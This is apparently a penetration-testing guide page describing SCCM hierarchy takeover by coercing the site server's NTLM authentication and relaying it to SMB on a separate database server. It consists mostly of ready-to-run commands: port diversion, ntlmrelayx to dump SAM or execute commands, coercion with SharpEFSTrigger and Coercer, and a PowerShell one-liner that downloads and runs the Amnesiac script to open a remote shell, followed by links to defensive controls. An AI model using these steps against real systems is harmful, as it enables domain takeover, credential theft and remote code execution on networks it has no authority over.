# TAKEOVER-2

## Document Reference

* [TAKEOVER-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/TAKEOVER/TAKEOVER-2/takeover-2_description.md)

## Description

Hierarchy takeover via NTLM coercion and relay to SMB on remote site database

## Requirements

* PKI certificates are not required for client authentication (default)
* SCCM database server hosted on a system that is independent of the main site server
* SMB is reachable and SMB signing isn’t required on the site database server
* Local Administrator if performing the attack from Windows (due to SMB port redirect)

## Tools Required

* divertTCPConn: <https://github.com/Arno0x/DivertTCPconn>
* Coercion Tools: <https://github.com/The-Viper-One/RedTeam-Pentest-Tools/tree/main/Coercion>
* ntlmrelayx: <https://github.com/The-Viper-One/RedTeam-Pentest-Tools/blob/main/Relay/ntlmrelayx.exe>

## Windows

Divert SMB on port 445 to port 8445 (Requires Local Administrator)

```
divertTCPconn.exe 445 8445
```

Set up ntlmrelayx to the alternate SMB port and to point at the MSSQL database server

```
# Dump SAM
ntlmrelayx.exe --smb-port 8445 -smb2support -t <MSSQL SSCM IP>

# Execute Commands
ntlmrelayx.exe --smb-port 8445 -smb2support -t 192.168.60.12 -c "[Command]"
```

Perform the coercerian with SharpEFSTrigger to relay the SCCM Site Server computer account to the MSSQL database server.

{% code overflow="wrap" %}

```powershell
# Option 2: SharpEFSTrigger
SharpEFSTrigger.exe <Site Server IP> <Listener IP> EfsRpcDecryptFileSrv

# Option 1: Coercer
Coercer.exe coerce -u [Username] -p "[Password]" -d [Domain] -t [Site Server IP] -l [Listener IP] --auth-type smb --filter-method-name EfsRpcDecryptFileSrv
```

{% endcode %}

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FQx4owEZEWo3iOypPA8MV%2Fimage.png?alt=media&#x26;token=9dcfa830-d3f1-496b-9e61-6adc88aa3509" alt=""><figcaption></figcaption></figure>

### Getting a full shell on Windows with Amnesiac

* Amnesiac: <https://github.com/Leo4j/Amnesiac>

Load Amnesiac through PowerShell

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell"><strong>iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac
</strong></code></pre>

Generate a global listener payload with option \[2]

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FcL3VwnzX9aMrz4MeQBur%2Fimage.png?alt=media&#x26;token=a6e85b4a-19fe-4347-af9c-98dd5f8d02db" alt=""><figcaption></figcaption></figure>

Use the payload within ntlmrelayx to be executed on the target system.

```powershell
# Setup with ntlmrelayx
ntlmrelayx.exe -t 192.168.60.12 -smb2support --smb-port 8445 -c "[PAYLOAD]"
```

Once we trigger coercion again, ntlmrelayx will execute the powershell payload on the target system. Once this is done, use option \[3] on Amnesiac to connect.

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FhCBbTdnhd4KBIVIl9woJ%2Fimage.png?alt=media&#x26;token=583aacaa-14dc-4c66-8dae-53c6aa700567" alt=""><figcaption></figcaption></figure>

### Defensive IDs

* [DETECT-1: Monitor site server domain computer accounts authenticating from another source](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/DETECT/DETECT-1/detect-1_description.md)
* [PREVENT-12: Require SMB signing on site systems](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/PREVENT/PREVENT-12/prevent-12_description.md)
* [PREVENT-20: Block unnecessary connections to site systems](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md)